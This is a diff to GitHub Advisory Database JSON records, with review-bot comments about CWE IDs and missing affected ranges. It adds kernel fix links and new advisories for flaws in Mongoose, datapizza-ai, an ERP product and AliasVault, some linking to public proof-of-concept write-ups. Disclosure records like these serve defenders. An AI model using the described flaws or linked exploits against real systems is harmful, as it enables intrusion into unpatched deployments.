@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-876r-52fj-4pxf", - "modified": "2026-02-19T18:31:43Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71235" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/7062eb0c488f35730334daad9495d9265c574853" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8890bf450e0b6b283f48ac619fca5ac2f14ddd62" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/891f9969a29e9767a453cef4811c8d2472ccab49" diff --git a/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json index 5ff8a05c13e27..43bdad75fed85 100644 --- a/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json +++ b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8j5g-3q2r-xfjh", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23224" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23224" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1caf50ce4af096d0280d59a31abdd85703cd995c" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/ae385826840a3c8e09bf38cac90adcd690716f57" diff --git a/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json index 44bf46a79999f..713a6adc2ca91 100644 --- a/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json +++ b/advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9wwr-2jh3-482p", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23220" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23220" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/010eb01ce23b34b50531448b0da391c7f05a72af" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/5accdc5b7f28a81bbc5880ac0b8886e60c86e8c8" diff --git a/advisories/unreviewed/2026/02/GHSA-c6h3-vh8h-r8mj/GHSA-c6h3-vh8h-r8mj.json b/advisories/unreviewed/2026/02/GHSA-c6h3-vh8h-r8mj/GHSA-c6h3-vh8h-r8mj.json new file mode 100644 index 0000000000000..b82d92829126e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c6h3-vh8h-r8mj/GHSA-c6h3-vh8h-r8mj.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c6h3-vh8h-r8mj", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2967" + ], + "details": "A security vulnerability has been detected in Cesanta Mongoose up to 7.20. This affects the function getpeer of the file /src/net_builtin.c of the component TCP Sequence Number Handler. The manipulation leads to improper verification of source of a communication channel. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitability is reported as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2967" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/tcp_rst.md" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/tcp_rst.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347334" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347334" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755450" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-940" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T04:16:02Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json index ab6050886d9c6..4e8b862c68e8b 100644 --- a/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json +++ b/advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f7pj-q7w5-89fg", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71236" @@ -41,6 +41,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/a46f81c1e627437de436e517f5fd4b725c15a1e6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b6df15aec8c3441357d4da0eaf4339eb20f5999f" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json index d0f1a3d713ba5..69d0bea00039b 100644 --- a/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json +++ b/advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g3vh-wfh4-fp76", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23227" @@ -18,6 +18,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/0cd2c155740dbd00868ac5a8ae5d14cd6b9ed385" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/52b330799e2d6f825ae2bb74662ec1b10eb954bb" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/60b75407c172e1f341a8a5097c5cbc97dbbdd893" diff --git a/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json index 39c71f21b1a2e..24773e971f897 100644 
--- a/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json +++ b/advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-h437-rr98-fx56", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23223" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23223" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1c253e11225bc5167217897885b85093e17c2217" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/1d411278dda293a507cb794db7d9ed3511c685c6" diff --git a/advisories/unreviewed/2026/02/GHSA-hg58-x52p-859c/GHSA-hg58-x52p-859c.json b/advisories/unreviewed/2026/02/GHSA-hg58-x52p-859c/GHSA-hg58-x52p-859c.json new file mode 100644 index 0000000000000..0a1cca9e9509b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hg58-x52p-859c/GHSA-hg58-x52p-859c.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hg58-x52p-859c", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2970" + ], + "details": "A vulnerability has been found in datapizza-labs datapizza-ai 0.0.2. Affected by this vulnerability is the function RedisCache of the file datapizza-ai-cache/redis/datapizza/cache/redis/cache.py. Such manipulation leads to deserialization. The attack requires being on the local network. A high complexity level is associated with this attack. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2970" + }, + { + "type": "WEB", + "url": "https://github.com/hacktivesec/datapizza-ai-disclosure/blob/main/unsafe-deserialization.md" + }, + { + "type": "WEB", + "url": "https://github.com/hacktivesec/datapizza-ai-disclosure/blob/main/unsafe-deserialization.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347337" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347337" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755363" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T05:16:20Z" + } +} \ No newline at end of file 
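Review bot: `cwe_ids` in this new record holds only the generic `CWE-20`, while the `details` text describes deserialization in `RedisCache` and the linked write-up is named `unsafe-deserialization.md`. Anyone triaging or alerting by CWE class would not find it under deserialization, so I would record the specific class next to the generic one: `"cwe_ids": ["CWE-20", "CWE-502"]`. The same mismatch appears in three other new files in this patch. GHSA-hx47-q2x9-r28j has `CWE-285` where the text reads as CWE-530, GHSA-jprc-mg35-68jq has `CWE-345` where the text reads as CWE-347, and GHSA-q5xx-fxv3-xxqf has `CWE-791` where the text reads as CWE-1336. These values presumably come from the upstream feed, so the correction may belong there rather than in this sync.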
diff --git a/advisories/unreviewed/2026/02/GHSA-hm88-j5r4-fwj3/GHSA-hm88-j5r4-fwj3.json b/advisories/unreviewed/2026/02/GHSA-hm88-j5r4-fwj3/GHSA-hm88-j5r4-fwj3.json new file mode 100644 index 0000000000000..a9b7be723fbc9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hm88-j5r4-fwj3/GHSA-hm88-j5r4-fwj3.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hm88-j5r4-fwj3", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2998" + ], + "details": "ERP developed by eAI Technologies has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a crafted DLL file in the same directory as the program, thereby executing arbitrary code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2998" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/en/cp-139-10723-14549-2.html" + }, + { + "type": "WEB", + "url": "https://www.twcert.org.tw/tw/cp-132-10722-db7cb-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T04:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hx47-q2x9-r28j/GHSA-hx47-q2x9-r28j.json b/advisories/unreviewed/2026/02/GHSA-hx47-q2x9-r28j/GHSA-hx47-q2x9-r28j.json new file mode 100644 index 0000000000000..b384fc8f4ab69 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hx47-q2x9-r28j/GHSA-hx47-q2x9-r28j.json 
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hx47-q2x9-r28j", + "modified": "2026-02-23T06:30:19Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2974" + ], + "details": "A vulnerability was identified in AliasVault App up to 0.25.3 on Android/iOS. This vulnerability affects unknown code of the file shared_prefs/aliasvault.xml of the component Backup Handler. The manipulation of the argument accessToken/refreshToken/metadata/key_derivation_params/auth_methods leads to exposure of backup file to an unauthorized control sphere. An attack has to be approached locally. The attack is considered to have high complexity. It is stated that the exploitability is difficult. The exploit is publicly available and might be used. Upgrading to version 0.26.0 is able to resolve this issue. The identifier of the patch is 873ecc03f92238e162f98a068ad56069a922b4f6/0bd662320174d8265dfe3b05a04bc13efc960532. It is recommended to upgrade the affected component. The creator of the software explains: \"Because of AliasVault's zero-knowledge encryption design, the tokens stored in aliasvault.xml are API session tokens that cannot decrypt the vault on their own: the master password is required for that. 
So while this isn't a direct vault compromise risk, there's no reason to include them in backups either.\"", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2974" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/issues/1497" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/issues/1497#issue-3855176470" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/pull/1499" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/commit/873ecc03f92238e162f98a068ad56069a922b4f6" + }, + { + "type": "WEB", + "url": "https://github.com/aliasvault/aliasvault/releases/tag/0.26.0" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347340" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347340" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756058" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756059" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T06:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json index e05a54ac69d1c..b5cac77372278 100644 --- a/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json +++ b/advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json 
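Review bot: `"affected": []` is empty although the `details` text says the issue covers AliasVault App up to 0.25.3 and is resolved in 0.26.0, so tooling that matches on package ranges will never surface this record. Once the package is identified (ecosystem and name are not given in this hunk), the range could be recorded as `"events": [{ "introduced": "0" }, { "fixed": "0.26.0" }]`. The text also names two patch commits, but `references` links only `873ecc03f92238e162f98a068ad56069a922b4f6`. A `WEB` entry for `0bd662320174d8265dfe3b05a04bc13efc960532` would let readers check the whole fix.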
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j6h2-wr53-6vcg", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23228" @@ -22,6 +22,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/6dd2645cf080a75be31fa66063c7332b291f46f0" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/77ffbcac4e569566d0092d5f22627dfc0896b553" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/787769c8cc50416af7b8b1a36e6bcd6aaa7680aa" diff --git a/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json index d5ec8b9ffcd23..0c719f64b5153 100644 --- a/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json +++ b/advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j87r-wgfm-7fjj", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23229" @@ -26,6 +26,10 @@ "type": "WEB", "url": "https://git.kernel.org/stable/c/8ee8ccfd60bf17cbdab91069d324b5302f4f3a30" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b505047ffc8057555900d2d3a005d033e6967382" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/c0a0ded3bb7fd45f720faa48449a930153257d3a" diff --git a/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json index 38ae638eb1509..687f68c233a63 100644 --- a/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json +++ b/advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jp99-8xc8-367m", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23221" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23221" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/148891e95014b5dc5878acefa57f1940c281c431" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/1d6bd6183e723a7b256ff34bbb5b498b5f4f2ec0" diff --git a/advisories/unreviewed/2026/02/GHSA-jprc-mg35-68jq/GHSA-jprc-mg35-68jq.json b/advisories/unreviewed/2026/02/GHSA-jprc-mg35-68jq/GHSA-jprc-mg35-68jq.json new file mode 100644 index 0000000000000..0fa953c2302e8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jprc-mg35-68jq/GHSA-jprc-mg35-68jq.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jprc-mg35-68jq", + "modified": "2026-02-23T06:30:18Z", + "published": "2026-02-23T06:30:18Z", + "aliases": [ + "CVE-2026-2968" + ], + "details": "A vulnerability was detected in Cesanta Mongoose up to 7.20. This impacts the function mg_chacha20_poly1305_decrypt of the file /src/tls_chacha20.c of the component Poly1305 Authentication Tag Handler. The manipulation results in improper verification of cryptographic signature. The attack may be launched remotely. This attack is characterized by high complexity. The exploitability is said to be difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2968" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/ChaCha20Poly1305.md" + }, + { + "type": "WEB", + "url": "https://github.com/dwBruijn/CVEs/blob/main/Mongoose/ChaCha20Poly1305.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347335" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347335" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.757091" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T04:16:02Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json index 315370750f042..e78395a210e50 100644 --- a/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json +++ b/advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m34c-wrf8-mw69", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71237" @@ -41,6 +41,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/ea2278657ad0d62596589fbe2caf995e189e65e7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ed527ef0c264e4bed6c7b2a158ddf516b17f5f66" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json index ea6059e047666..a135a1f5fe37f 100644 --- a/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json +++ b/advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mx4x-pxgm-r77w", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:17Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-71231" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71231" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/48329301969f6d21b2ef35f678e40f72b59eac94" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/c77b33b58512708bd5603f48465f018c8b748847" diff --git a/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json index f43c4e522439a..356c8102d352a 100644 
--- a/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json +++ b/advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p525-h9pq-233r", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23225" @@ -14,6 +14,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23225" }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/1e83ccd5921a610ef409a7d4e56db27822b4ea39" + }, { "type": "WEB", "url": "https://git.kernel.org/stable/c/81f29975631db8a78651b3140ecd0f88ffafc476" diff --git a/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json index 269fd606d633f..69821a25b2ffd 100644 --- a/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json +++ b/advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p68h-c56f-p3v6", - "modified": "2026-02-19T18:31:44Z", + "modified": "2026-02-23T06:30:18Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2026-23230" @@ -33,6 +33,10 @@ { "type": "WEB", "url": "https://git.kernel.org/stable/c/c4b9edd55987384a1f201d3d07ff71e448d79c1b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ec306600d5ba7148c9dbf8f5a8f1f5c1a044a241" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-q5xx-fxv3-xxqf/GHSA-q5xx-fxv3-xxqf.json b/advisories/unreviewed/2026/02/GHSA-q5xx-fxv3-xxqf/GHSA-q5xx-fxv3-xxqf.json new file mode 100644 index 0000000000000..ac56b773b36ac --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q5xx-fxv3-xxqf/GHSA-q5xx-fxv3-xxqf.json 
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-q5xx-fxv3-xxqf",
+ "modified": "2026-02-23T06:30:18Z",
+ "published": "2026-02-23T06:30:18Z",
+ "aliases": [
+ "CVE-2026-2969"
+ ],
+ "details": "A flaw has been found in datapizza-labs datapizza-ai 0.0.2. Affected is the function ChatPromptTemplate of the file datapizza-ai-core/datapizza/modules/prompt/prompt.py of the component Jinja2 Template Handler. This manipulation of the argument Prompt causes improper neutralization of special elements used in a template engine. Remote exploitation of the attack is possible. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2969"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hacktivesec/datapizza-ai-disclosure/blob/main/ssti.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hacktivesec/datapizza-ai-disclosure/blob/main/ssti.md#poc"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347336"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347336"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755357"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-791"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T05:16:19Z"
+ }
+}
\ No newline at end of file
